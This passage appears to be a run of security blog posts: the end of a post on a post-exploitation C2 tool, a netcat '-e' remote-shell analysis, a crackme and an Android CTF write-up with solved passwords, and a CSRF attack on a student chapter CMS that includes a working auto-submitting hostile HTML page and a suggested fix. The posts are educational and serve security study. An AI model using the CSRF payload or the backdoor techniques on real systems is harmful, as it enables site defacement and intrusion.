  • crypto: If anything, I’d say encrypted communications are the one thing keeping this from being a really usable tool. Right now, communications are sent in the clear essentially, although they are base64 encoded for the slightest amount of obfuscation. Ideally I’d use Python’s ssl library, probably doing something like hardcoding a server public key into the client. A solution that wouldn’t be as much work, but only slightly more secure than the current cleartext communications would be to use a basic xor cipher which would be pretty easy to write, and force an analyst to retrieve the key from memory, or the initial exchange over the network, depending on how I chose to implement it.
  • protocol improvement: This shouldn’t actually be too hard to implement, but the data section of a poet message is typically some type of keyword, a space, then any relevant data. For example, to start a shell, the server sends over “shell”, to get recon data, the server sends “recon”, for an exec command, the server sends over “exec” followed by the commands to execute. Instead of using these string keywords, it would be possible to move them into the protocol as a single byte after the data size and have some sort of lookup table for referencing the appropriate action to each key.
  • interval fuzzing: Instead of having a strict, predictable delay time interval for client pings, I could implement some sort of fuzzing so that the delay time is slightly variable for further obfuscation purposes.

and last, but not least…

  • botnet(?!): Now that I more or less have the infrastructure down for controlling a single client, it would be pretty cool to fork the project and adapt it for a more distributed design with multiple clients connecting to the server, all receiving commands to execute.

Again, all the code for this project is available on github. Hopefully this was interesting/helpful for some people, and as always thanks for reading!


  1. Writing this post and thinking about this again actually helped me discover a bug in the server where the server would terminate if it happened to receive a non-client HTTP request while waiting for the client. This would enable a third party that wanted to mess with the Poet user to spam the Poet user’s machine with HTTP requests (assuming they knew the proper port to send to) at any interval smaller than the Poet interval, and effectively DOS Poet.

Netcat “-e” Analysis

As I mentioned in a previous post, netcat has this cool -e parameter that lets you specify an executable to essentially turn into a network service, that is, a process that can send and receive data over the network. This option is option is particularly useful when called with a shell (/bin/sh, /bin/bash, etc) as a parameter because this creates a poor man’s remote shell connection, and can also be used as a backdoor into the system. As part of the post-exploitation tool I’m working on, I wanted to try to add this type of remote shell feature, but it wasn’t immediately obvious to me how something like this would be done, so I decided to dive into netcat’s source and see if I could understand how it was implemented.

Not knowing where to start, I first tried searching the file for “-e” which brought me to:

case 'e':           /* prog to exec */
  if (opt_exec)
ncprint(NCPRINT_ERROR | NCPRINT_EXIT,
    _("Cannot specify `-e' option double"));
  opt_exec = strdup(optarg);
  break;

This snippet is using the GNU argument parsing library, getopt, to check if “-e” is set, and if not, setting the global char* variable opt_exec to the parameter. Then I tried searching for opt_exec, bringing me to:

if (netcat_mode == NETCAT_LISTEN) {
  if (opt_exec) {
ncprint(NCPRINT_VERB2, _("Passing control to the specified program"));
ncexec(&listen_sock);       /* this won't return */
  }
  core_readwrite(&listen_sock, &stdio_sock);
  debug_dv(("Listen: EXIT"));
}

This code checks if opt_exec is set, and if so calling ncexec().

 1 /* Execute an external file making its stdin/stdout/stderr the actual socket */
 2 
 3 static void ncexec(nc_sock_t *ncsock)
 4 {
 5   int saved_stderr;
 6   char *p;
 7   assert(ncsock && (ncsock->fd >= 0));
 8 
 9   /* save the stderr fd because we may need it later */
10   saved_stderr = dup(STDERR_FILENO);
11 
12   /* duplicate the socket for the child program */
13   dup2(ncsock->fd, STDIN_FILENO);   /* the precise order of fiddlage */
14   close(ncsock->fd);            /* is apparently crucial; this is */
15   dup2(STDIN_FILENO, STDOUT_FILENO);    /* swiped directly out of "inetd". */
16   dup2(STDIN_FILENO, STDERR_FILENO);    /* also duplicate the stderr channel */
17 
18   /* change the label for the executed program */
19   if ((p = strrchr(opt_exec, '/')))
20     p++;            /* shorter argv[0] */
21   else
22     p = opt_exec;
23 
24   /* replace this process with the new one */
25 #ifndef USE_OLD_COMPAT
26   execl("/bin/sh", p, "-c", opt_exec, NULL);
27 #else
28   execl(opt_exec, p, NULL);
29 #endif
30   dup2(saved_stderr, STDERR_FILENO);
31   ncprint(NCPRINT_ERROR | NCPRINT_EXIT, _("Couldn't execute %s: %s"),
32       opt_exec, strerror(errno));
33 }               /* end of ncexec() */

Here, on lines 13-16 is how the “-e” parameter really works. dup2() accepts two file descriptors and after deallocating the second one (as if close() was called on it), the second one’s value is set to the first. So in this case on line 13, the child process’s stdin is being set to the file descriptor for the network socket netcat opened. This means that the child process will view any data received over the network will as input data and will act accordingly. Then on lines 15 and 16, the stdout and stderr descriptors are also set to the socket, which will cause any output the program has to be directed over the network. As far as line 14 goes, I’m not sure why the original socket file descriptor has to be closed at that exact point (and based on the comments, it seems like the netcat author wasn’t sure either).

The main point is this file descriptor swapping has essentially converted our specified program into a network service; all the input and output will be piped over the network, and at this point the child process can be executed. The child will replace the netcat process and will also inherit the newly set socket file descriptors. Note that on lines 30 and 31 there’s some error handling code that resets the original stderr for the netcat process and prints out an error message. This is because the code should actually never get to this point in execution due to the execl() call and if it does, there was an error executing the child.

I wrote this little python program to see if I understood things correctly:

#!/usr/bin/env python

import sys

inp = sys.stdin.read(5)
if inp == 'hello':
    sys.stdout.write('hi\n')
else:
    sys.stdout.write('bye\n')

It simply reads 5 bytes from stdin and prints ‘hi’ if those 5 bytes were ‘hello’ otherwise printing ‘bye’.

Using this program as the -e parameter results in this:

1
2
3
4
5
6
7
8
9
10
$ netcat -e /tmp/test.py -lp 8080 &
[1] 19021
$ echo asdfg | netcat 127.0.0.1 8080
bye
[1]+  Done                    netcat -e /tmp/blah.py -lp 8080
$ netcat -e /tmp/test.py -lp 8080 &
[1] 19024
$ echo hello | netcat 127.0.0.1 8080
hi
[1]+  Done                    netcat -e /tmp/blah.py -lp 8080

We can see the “server” launched in the background. The echo command sends data into netcat’s stdin, which is being sent over the network, handled by the python script, which sends back its response, which gets printed. Then we can see that the server exits since the netcat process has been replaced by the script, and the script has exited.

Beginner Crackme

As part of an Intro to Security course I’m taking, my professor gave us a crackme style exercise to practice reading x86 assembly and basic reverse engineering.

The program is pretty simple. It accepts a password as an argument and we’re told that if the password is correct, “ok” is printed.

$ ./crackme
usage: ./crackme <secret>
$ ./crackme test
$

As usual, I start by running file on the binary, which shows that it’s a standard x64 ELF binary. file also says that the binary is “not stripped”, which means that it includes symbols. All I really know about symbols are that they can include debugging information about a binary like function and variable names and some symbols aren’t really necessary; they can be stripped out to reduce the binary’s size and make reverse engineering more challenging. Maybe I’ll do a more in depth post on this in the future.

$ file crackme
crackme: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0x3fcf895b7865cb6be6b934640d1519a1e6bd6d39, not stripped

Next, I run strings, hoping to get lucky and find the password amongst the strings in the binary. Strings looks for series of printable characters followed by a NULL, but unfortunately nothing here works as the password.

$ strings crackme
/lib64/ld-linux-x86-64.so.2
exd4
libc.so.6
puts
printf
memcmp
__libc_start_main
__gmon_start__
GLIBC_2.2.5
fffff.
AWAVA
AUATL
[]A\A]A^A_
usage: %s <secret>
;*3$"

Since that didn’t work, we’re forced to disassemble the binary and actually try to reverse engineer it. We’ll start with main.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ gdb -batch -ex 'file crackme' -ex 'disas main'
Dump of assembler code for function main:
   0x00000000004004a0 <+0>:     sub    rsp,0x8
   0x00000000004004a4 <+4>:     cmp    edi,0x1
   0x00000000004004a7 <+7>:     jle    0x4004c7 <main+39>
   0x00000000004004a9 <+9>:     mov    rdi,QWORD PTR [rsi+0x8]
   0x00000000004004ad <+13>:    call   0x4005e0 <verify_secret>
   0x00000000004004b2 <+18>:    test   eax,eax
   0x00000000004004b4 <+20>:    je     0x4004c2 <main+34>
   0x00000000004004b6 <+22>:    mov    edi,0x4006e8
   0x00000000004004bb <+27>:    call   0x400450 <puts@plt>
   0x00000000004004c0 <+32>:    xor    eax,eax
   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret
   0x00000000004004c7 <+39>:    mov    rsi,QWORD PTR [rsi]
   0x00000000004004ca <+42>:    mov    edi,0x4006d4
   0x00000000004004cf <+47>:    xor    eax,eax
   0x00000000004004d1 <+49>:    call   0x400460 <printf@plt>
   0x00000000004004d6 <+54>:    mov    eax,0x1
   0x00000000004004db <+59>:    jmp    0x4004c2 <main+34>
End of assembler dump.

Let’s break this down a little.

1
2
3
0x00000000004004a0 <+0>:     sub    rsp,0x8
0x00000000004004a4 <+4>:     cmp    edi,0x1
0x00000000004004a7 <+7>:     jle    0x4004c7 <main+39>

Starting at the beginning, we see the stack pointer decremented as part of the function prologue. The prologue is a set of setup steps involving saving the old frame’s base pointer on the stack, reassigning the base pointer to the current stack pointer, then subtracting the stack pointer a certain amount to make room on the stack for local variables, etc. We don’t see the former two steps because this is the main function so it doesn’t really have a function calling it, so saving/setting the base pointer isn’t necessary.

Then the edi register is compared to 1 and if it is less than or equal, we jump to offset 39.

1
2
3
4
5
6
7
8
   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret
   0x00000000004004c7 <+39>:    mov    rsi,QWORD PTR [rsi]
   0x00000000004004ca <+42>:    mov    edi,0x4006d4
   0x00000000004004cf <+47>:    xor    eax,eax
   0x00000000004004d1 <+49>:    call   0x400460 <printf@plt>
   0x00000000004004d6 <+54>:    mov    eax,0x1
   0x00000000004004db <+59>:    jmp    0x4004c2 <main+34>

Here at offset 39, we print something then jump to offset 34 where we repair the stack (undo the sub instruction from the prologue) and return (ending execution).

This is likely how the program checks the arguments and prints the usage message if no arguments are supplied (which would cause argc/edi to be 1).

However if we supply an argument, edi is 0x2 and we move past the jle instruction.

1
2
   0x00000000004004a9 <+9>:     mov    rdi,QWORD PTR [rsi+0x8]
   0x00000000004004ad <+13>:    call   0x4005e0 <verify_secret>

Here we can see the verify_secret function being called with a parameter in rdi. This is most likely the argument we passed into the program. We can confirm this with gdb (I’m using it with peda here).

gdb-peda$ tele $rsi
0000| 0x7fffffffeb48 --> 0x7fffffffed6e ("/home/vagrant/crackme/crackme")
0008| 0x7fffffffeb50 --> 0x7fffffffed8c --> 0x4548530074736574 ('test')
0016| 0x7fffffffeb58 --> 0x0

Indeed rsi points to the first element of argv, so incrementing that by 8 bytes (because 64 bit) points to argv[1], which is our input.

If we look after the verify_secret call we can see the program checks if eax is 0 and if it is, jumps to offset 34, ending the program. However, if eax is not zero, we’ll hit a puts call before exiting, which will presumably print out the “ok” message we want.

1
2
3
4
5
6
7
   0x00000000004004b2 <+18>:    test   eax,eax
   0x00000000004004b4 <+20>:    je     0x4004c2 <main+34>
   0x00000000004004b6 <+22>:    mov    edi,0x4006e8
   0x00000000004004bb <+27>:    call   0x400450 <puts@plt>
   0x00000000004004c0 <+32>:    xor    eax,eax
   0x00000000004004c2 <+34>:    add    rsp,0x8
   0x00000000004004c6 <+38>:    ret

Now lets disassemble verify_secret to see how the input validation is performed, and to see how we can make it return non-zero.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Dump of assembler code for function verify_secret:
   0x00000000004005e0 <+0>:     sub    rsp,0x408
   0x00000000004005e7 <+7>:     movzx  eax,BYTE PTR [rdi]
   0x00000000004005ea <+10>:    mov    rcx,rsp
   0x00000000004005ed <+13>:    test   al,al
   0x00000000004005ef <+15>:    je     0x400622 <verify_secret+66>
   0x00000000004005f1 <+17>:    mov    rdx,rsp
   0x00000000004005f4 <+20>:    jmp    0x400604 <verify_secret+36>
   0x00000000004005f6 <+22>:    nop    WORD PTR cs:[rax+rax*1+0x0]
   0x0000000000400600 <+32>:    test   al,al
   0x0000000000400602 <+34>:    je     0x400622 <verify_secret+66>
   0x0000000000400604 <+36>:    xor    eax,0xfffffff7
   0x0000000000400607 <+39>:    lea    rsi,[rsp+0x400]
   0x000000000040060f <+47>:    add    rdx,0x1
   0x0000000000400613 <+51>:    mov    BYTE PTR [rdx-0x1],al
   0x0000000000400616 <+54>:    add    rdi,0x1
   0x000000000040061a <+58>:    movzx  eax,BYTE PTR [rdi]
   0x000000000040061d <+61>:    cmp    rdx,rsi
   0x0000000000400620 <+64>:    jb     0x400600 <verify_secret+32>
   0x0000000000400622 <+66>:    mov    edx,0x18
   0x0000000000400627 <+71>:    mov    esi,0x600a80
   0x000000000040062c <+76>:    mov    rdi,rcx
   0x000000000040062f <+79>:    call   0x400480 <memcmp@plt>
   0x0000000000400634 <+84>:    test   eax,eax
   0x0000000000400636 <+86>:    sete   al
   0x0000000000400639 <+89>:    add    rsp,0x408
   0x0000000000400640 <+96>:    movzx  eax,al
   0x0000000000400643 <+99>:    ret
End of assembler dump.

I won’t walk through this one in detail because understanding each line isn’t necessary to crack this. Let’s skip to the memcmp call. If memcmp returns 0, eax is set to 1 and the function returns. This is exactly what we want. From the man page, memcmp takes three parameters, two buffers to compare and their lengths, and returns 0 if the buffers are identical.

1
2
3
4
   0x0000000000400622 <+66>:    mov    edx,0x18
   0x0000000000400627 <+71>:    mov    esi,0x600a80
   0x000000000040062c <+76>:    mov    rdi,rcx
   0x000000000040062f <+79>:    call   0x400480 <memcmp@plt>

Here’s the setup to the memcmp call. We can see the third parameter for length is the immediate 0x18 meaning the buffers will be 24 bytes in length. If we examine address 0x600a80, we find this 24 byte string:

gdb-peda$ hexd 0x600a80 /2
0x00600a80 : 91 bf a4 85 85 c3 ba b9 9f a6 b6 b1 93 b9 83 8f   ................
0x00600a90 : ae b1 ae c1 bc 80 ca ca 00 00 00 00 00 00 00 00   ................

Since this is a direct address to some memory, we can be fairly certain that we’ve found some sort of secret value! Based on the movzx eax,BYTE PTR [rdi] instruction (offset 7) which moves a byte from the input string into eax, the xor eax, 0xfffffff7 instruction (offset 36), and the add rdi, 0x1 instruction (offset 54) which increments the char* pointer to our input string, we can reasonably guess that this function is xor’ing each character of our input with 0xf7 and writing the result into a buffer which begins at rsp (also pointed to by rcx). Since we now know the secret (\x91\xbf\xa4\x85...) and the xor key (0xf7) it’s pretty easy to extract the password we need by xor’ing each byte of the secret with the xor key.

Here’s a way to do this with python.

str = '\x91\xbf\xa4\x85\x85\xc3\xba\xb9\x9f\xa6\xb6\xb1\x93\xb9\x83\x8f\xae\xb1\xae\xc1\xbc\x80\xca\xca'
ba = bytearray(str)
for i, byte in enumerate(ba):
    ba[i] ^= 0xf7
print ba

Which results in this:

$ python crack.py
fHSrr4MNhQAFdNtxYFY6Kw==
$ ./crackme fHSrr4MNhQAFdNtxYFY6Kw==
ok

SU-CTF 2014 - “Commerical Application!”

This weekend I decided to try playing SU-CTF. I’m pretty bad at CTF to be honest, so I was pretty thrilled to get one of the 200 point challenges in the third (of five) difficulty tiers.

“Commerical Application!”

For this challenge, we’re given an Android application and the hint:

Flag is a serial number.

I installed it on my phone, here’s what it looks like:

I can tap on “Picture-01” and sliding to the right reveals this picture, but if I try to tap on “Picture-02” or “Pictures-03” the app says I need to enter a registration key. If I tap on the gear in the top right, I’m prompted to enter my product key.

Running file reveals that .apk files are apparently just Zip archives, so let’s try simply unzip‘ing it.

$ file suCTF.apk
suCTF.apk: Zip archive data, at least v2.0 to extract
$ unzip suCTF.apk
Archive:  suCTF.apk
  inflating: assets/db.db
  inflating: res/color/abs__primary_text_disable_only_holo_dark.xml
  inflating: res/color/abs__primary_text_disable_only_holo_light.xml
  ...
  inflating: classes.dex
  inflating: META-INF/MANIFEST.MF
  inflating: META-INF/CERT.SF
  inflating: META-INF/CERT.RSA

Cool! Now we have all the miscellaneous files that comprise the app. There’s a database file, various .xml design files, and most interestingly, a classes.dex file. .dex files contain bytecode run on the Android Dalvik VM, which is currently the Java runtime for Android devices, so classes.dex likely contains the code that runs the app, in compiled form. We can use the nifty d2j-dex2jar utility for decompiling it into a classes-dex2jar.jar file. .jar files are apparently also Zip archives, and we can again unzip it to extract its contents.

$ file classes.dex
classes.dex: Dalvik dex file version 035
$ d2j-dex2jar classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$ unzip classes-dex2jar.jar
  ...
  inflating: edu/sharif/ctf/BuildConfig.class
  inflating: edu/sharif/ctf/CTFApplication.class
  inflating: edu/sharif/ctf/R$attr.class
  inflating: edu/sharif/ctf/R$bool.class
  inflating: edu/sharif/ctf/R$color.class
  inflating: edu/sharif/ctf/R$dimen.class
  inflating: edu/sharif/ctf/R$drawable.class
  inflating: edu/sharif/ctf/R$id.class
  inflating: edu/sharif/ctf/R$integer.class
  inflating: edu/sharif/ctf/R$layout.class
  inflating: edu/sharif/ctf/R$menu.class
  inflating: edu/sharif/ctf/R$string.class
  inflating: edu/sharif/ctf/R$style.class
  inflating: edu/sharif/ctf/R$styleable.class
  inflating: edu/sharif/ctf/R.class
  inflating: edu/sharif/ctf/activities/MainActivity$4.class
  inflating: edu/sharif/ctf/activities/MainActivity$5.class
  inflating: edu/sharif/ctf/activities/MainActivity$6.class
  inflating: edu/sharif/ctf/config/AppConfig.class
  inflating: edu/sharif/ctf/db/DBHelper.class
  inflating: edu/sharif/ctf/fragments/DListFragment$1.class
  inflating: edu/sharif/ctf/fragments/ListFragment$1.class
  inflating: edu/sharif/ctf/fragments/ListFragment$OnPictureSelectedListener.class
  inflating: edu/sharif/ctf/security/KeyVerifier.class
  ...

This produces a TON of various .class files, but the most interesting lie in the edu/sharif/ctf/ directory and are the compiled versions of the actual code that makes up this app. We can use the jad tool to decompile these back into Java source and start trying to reverse the product key.

There’s a directory in the app source called security/ and contains a file called KeyVerifier.class that seems pretty promising. After decompiling it, we find a KeyVerifier class with some pretty cool functions.

public static boolean isValidLicenceKey(String s, String s1, String s2)
{
    boolean flag;
    if(encrypt(s, s1, s2).equals("29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84"))
        flag = true;
    else
        flag = false;
    return flag;
}

public static String encrypt(String s, String s1, String s2)
{
    String s3 = "";
    String s4;
    SecretKeySpec secretkeyspec = new SecretKeySpec(hexStringToBytes(s1), "AES");
    Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    cipher.init(1, secretkeyspec, new IvParameterSpec(s2.getBytes()));
    s4 = bytesToHexString(cipher.doFinal(s.getBytes()));
    s3 = s4;
_L2:
    return s3;
    Exception exception;
    exception;
    exception.printStackTrace();
    if(true) goto _L2; else goto _L1
_L1:
}

It’s pretty clear that isValidLicenceKey() is what processes the product key prompt in the app. The encrypt() function shows us that the first paramter s is the cleartext to be encrypted, the second parameter s1 is the AES encryption key, and the last parameter s2 is the AES initialization vector. After doing a bit of grepping, I confirmed this by decompiling activities/MainActivity.class and finding this code snippet:

public void onClick(DialogInterface dialoginterface, int i)
{
    if(KeyVerifier.isValidLicenceKey(userInput.getText().toString(), app.getDataHelper().getConfig().getSecurityKey(), app.getDataHelper().getConfig().getSecurityIv()))
    {
        app.getDataHelper().updateLicence(2014);
        MainActivity.isRegisterd = true;
        showAlertDialog(context, "Thank you, Your application has full licence. Enjoy it...!");
    } else
    {
        showAlertDialog(context, "Your licence key is incorrect...! Please try again with another.");
    }
}

With this in mind, the code seems to AES encrypt the user input and check if it matches a certain output. If we had the AES key and IV, we could decrypt the given output and find the plaintext product key.

Tracing through the calls for the second and third parameters passed into isValidLicense() I found that the AES key and IV were stored in the assets/db.db SQLite database I noticed earlier.

$ sqlite3 assets/db.db
 ...
 sqlite> select * from config;
 a           b           c           d           e                 f                                 g           h               i
 ----------  ----------  ----------  ----------  ----------------  --------------------------------  ----------  --------------  ----------
 1           2           2014        0           a5efdbd57b84ca36  37eaae0141f1a3adf8a1dee655853714  1000        ctf.sharif.edu  9

There are no headers to the columns, but it is pretty obvious that the key is the longer and the IV is the shorter of the “interesting strings” in the database. For further confidence, I can verify this from the decompiled code in db/DBHelper.class.

public AppConfig getConfig()
{
    boolean flag = true;
    AppConfig appconfig = new AppConfig();
    Cursor cursor = myDataBase.rawQuery(SELECT_QUERY, null);
    if(cursor.moveToFirst())
    {
        appconfig.setId(cursor.getInt(0));
        appconfig.setName(cursor.getString(flag));
        appconfig.setInstallDate(cursor.getString(2));
        if(cursor.getInt(3) <= 0)
            flag = false;
        appconfig.setValidLicence(flag);
        appconfig.setSecurityIv(cursor.getString(4));
        appconfig.setSecurityKey(cursor.getString(5));
        appconfig.setDesc(cursor.getString(7));
    }
    return appconfig;
}

Using the key, IV and expected encrypted output, I wrote a simple decryption program.

import java.util.*;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class blah {
    // omitted for brevity
    public static String bytesToHexString(byte abyte0[]) { ... }
    public static byte[] hexStringToBytes(String s) { ... }

    public static String decrypt(String s, String s1, String s2)
    {
        SecretKeySpec secretkeyspec = new SecretKeySpec(hexStringToBytes(s1), "AES");
        Cipher cipher = null;
        byte[] key = null;
        try {
            cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, secretkeyspec, new IvParameterSpec(s2.getBytes()));
            key = cipher.doFinal(hexStringToBytes(s));
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new String(key);
    }

    public static void main(String args[]) {
        String e = "29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84";
        String iv = "a5efdbd57b84ca36";
        String key = "37eaae0141f1a3adf8a1dee655853714";
        System.out.println(decrypt(e, key, iv));
    }
}
$ java blah
fl-ag-IS-se-ri-al-NU-MB-ER

Thanks for reading!

Abusing Admin Privileges via CSRF

Exploiting a classic CSRF vulnerability

When I took over responsibility as the webmaster for Northeastern University’s IEEE student chapter around January 2014 (yes, this is a very belated post), I was suddenly reponsible for maintaining a custom LAMP stack Content Management System (CMS) whose core functionality was letting an admin post to a news feed on the front page of the site. This site has since been completely redone, but given that it is notoriously difficult to program securely in PHP, I decided to poke around a little and see if I could find any cool bugs.

Initially, I started looking for the most blatant web vulns, SQLi and XSS, but was pleasantly surprised to find in the register.php file, for example, that handles user registration, to find a input sanitation check.

if ((isValid($_POST['newusername']))&&(isValid($_POST['newpassword'])))
{
    // continue with registration
}

where isValid() looks like

function isValid($varx)
{
    $valid = true;
    $bad_stuff = array("#","(",")","<",">","?","/","\\","[","]","|","$","'",":",";", "@");
    for($index = 0; $index < strlen($varx); $index++) {
        if(in_array(substr($varx,$index,1), $bad_stuff)) {
            $valid = false;
        }
    }
    if(substr($varx, 0, 1) == " ") {
        $valid = false;
    }
    return $valid;
}

This code has a pretty substantial blacklist of commonly used characters in injections and operates by iterating over each character of the questionable input and testing if the character is in the blacklist, if so, setting the $valid variable to false. This seems to be an effective technique at ensuring the input is safe to use, however OWASP tends to discourage this model.

After ruling this out of potential vulns, I looked a little deeper into the code that powered the posting of news to the website, add-news.php.

Here we can see that if the HTTP request is a “POST” and the PHP session variables “isadmin” and “isofficer” are set to “yessir” and “true” respectively, then the code that adds news gets executed.

if ($_SERVER['REQUEST_METHOD'] == "POST")
    {
        include("ieee-lib.php");
        if(isset($_SESSION['isadmin']) || isset($_SESSION['isofficer']))
        {
            if($_SESSION['isadmin'] == "yessir" || $_SESSION['isofficer'] == "true")
            {
                // add news

After these access checks pass, the POST request data is processed and ultimately a SQL query string is generated.

// continued from above
$title = htmlspecialchars($_POST['news_title'], ENT_QUOTES);
$text = htmlspecialchars($_POST['post'], ENT_QUOTES);
{ ... } // some omitted stuff
$user_query = "SELECT user_id, username FROM " . $INFO['sql_prefix'] . "users WHERE username = '" . $_SESSION['username'] . "'";
$user_result = mysql_query($user_query);
if($user_result)
{
    //Returns an array with the data from the SQL select statement
    $user_row = mysql_fetch_row($user_result);

    $query1 = "INSERT INTO " . $INFO['sql_prefix'] . "news (news_title, news_type, time_posted, time_meeting, news_body, author_id, author_name, meeting_location) ";
    $query2 = "VALUES ('" . $title . "', '" . $type_of_news . "', '" . time() . "', '" . $time_of_meeting . "', '" . $text . "', '" . $user_row[0] . "', '" . $user_row[1] . "', '" . $meetinglocation . "')";
    $add_news_query = $query1 . $query2;
    $add_news_result = mysql_query($add_news_query);

    if($add_news_result)
    {
        header('Location: http://www.ieee.neu.edu/?page=addnews&success=true');
    }
    else
    {
        header('Location: http://www.ieee.neu.edu/?page=addnews&error=unable_to_post_news');
    }
}
// done

The important part to notice here is that there is no code that ensures the legitimacy of the request, that is, that a currently authenticated admin user actually meant to make this request. In this scenario if we can somehow find a way to get the admin to submit an arbitrary POST request to the add-news.php page, since she already has the session all set up in her browser, we can bypass the session checks previously shown and add arbitrary news to the website, for example.

You might be wondering how we can get the admin to submit arbitrary POST requests without her noticing. The most obvious answer is physical access to the her machine while she’s away or something, but a much more realistic scenario would be if we would get the admin to browse to a web page that we (the attacker) control, we can use some nifty JavaScript magic to get her to automatically submit the proper POST request on our behalf.

This is called Cross Site Request Forgery).

It turns out that these types of malicious pages are actually very simple to write. Remember, all that’s really needed is JavaScript execution, so for example if you had previous knowledge of a site that the admin frequented that had an XSS vulnerability, that would be a perfect way to chain these attacks. Anyway, here’s an example malicious page 1.

<!DOCTYPE HTML>
<html>
<body>
    <h1>non-malicious website! :)</h1>
    <form id="thisform" action="http://www.ieee.neu.edu/add-news.php" method="POST"
          style="display:none;">
        <input type="text" name="news_title" value="breaking news: u got hacked" />
        <input type="text" name="post" value="insert website defacement here" />
        <input type="submit"/>
    </form>
    <script type="text/javascript" charset="utf-8">
        var frm = document.getElementById("thisform");
        frm.submit();
    </script>
</body>
</html>

Nothing fancy here, just a simple hidden form with the values you want to submit to the page, and some JS that submits the form.

A caveat: Yes, it is true that you would have to guess the proper field names (“posts”, “news_title”) but even if you can only guess “posts”, you can write anything into the body of the news post.

End result looks something like this.

There was an identical bug in the code that handles editing users. Let’s have some fun!

In both of these gifs, the admin user was logged in, and then they opened a malicious html file, simulating visiting a malicious website. The mere act of opening the web page triggered the payload which sent the POST to the server, adding the news, and changing the user.

So how do we fix this sort of thing? The most common way involves the server requiring a randomly generated, non-predictable token that is associated with the user session with each request. An example could be that every time the actual admin web interface form is loaded, it contains a hidden field, invisible to the admin, with this token that is sent along with the request. The server verifies that it sent this token out previously, and that the token hasn’t expired, and if everything else checks out, the request goes through. This crucial missing piece of information will prevent attackers from successfully faking requests as the authenticated user.


  1. For more examples of how to trigger your CSRF payload via JavaScript, check out the excellent Ruby on Rails Security Guide